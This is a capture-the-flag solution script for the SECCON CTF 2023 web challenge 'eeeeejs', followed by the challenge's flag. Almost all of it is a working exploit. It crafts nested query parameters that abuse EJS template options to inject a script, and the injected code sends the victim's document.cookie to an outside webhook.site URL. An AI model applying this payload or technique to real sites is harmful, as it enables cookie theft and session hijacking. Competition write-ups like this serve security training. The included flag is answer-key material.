SECCON CTF 2023 Quals - eeeeejs (Web)

solve.py

from urllib.parse import urlencode

HOST = "http://eeeeejs.seccon.games:3000/"
HOST = "http://localhost:3000/"
HOST = "http://web:3000/"


def html_encode(s):
    return "".join(["&#x" + hex(ord(c))[2:] + ";" for c in s])


payload = {
    "cache": "x",
    "filename": "render.dist.js",
    "direc": """
"xxxxxx":"x"}};}});
location=`https://webhook.site/4f37728c-5479-4e68-800b-1bebc7faecec/?f=`+encodeURIComponent(document.cookie);
({"x"(exports,module2){module2.exports={xxxxx:{"yyyy
""".strip(),
    "settings[view options][openDelimiter]": '        "gi',
    "settings[view options][delimiter]": "t",
    "settings[view options][closeDelimiter]": "ory-deploy",
}

payload = urlencode(payload)

payload = {
    "cache": "x",
    "debug": "1",
    "filename[href]": "a",
    f"filename[<script src='/?{html_encode(payload)}'></script>]": "x",
    "filename[origin]": "x",
    "filename[protocol]": "file:",
    "filename[hostname]": "",
    "filename[pathname]": "index.ejs",
}

payload = urlencode(payload)

payload = HOST + "?" + payload

print(payload)

# FLAG=SECCON{RCE_is_po55ible_if_mitigation_4_does_not_exist}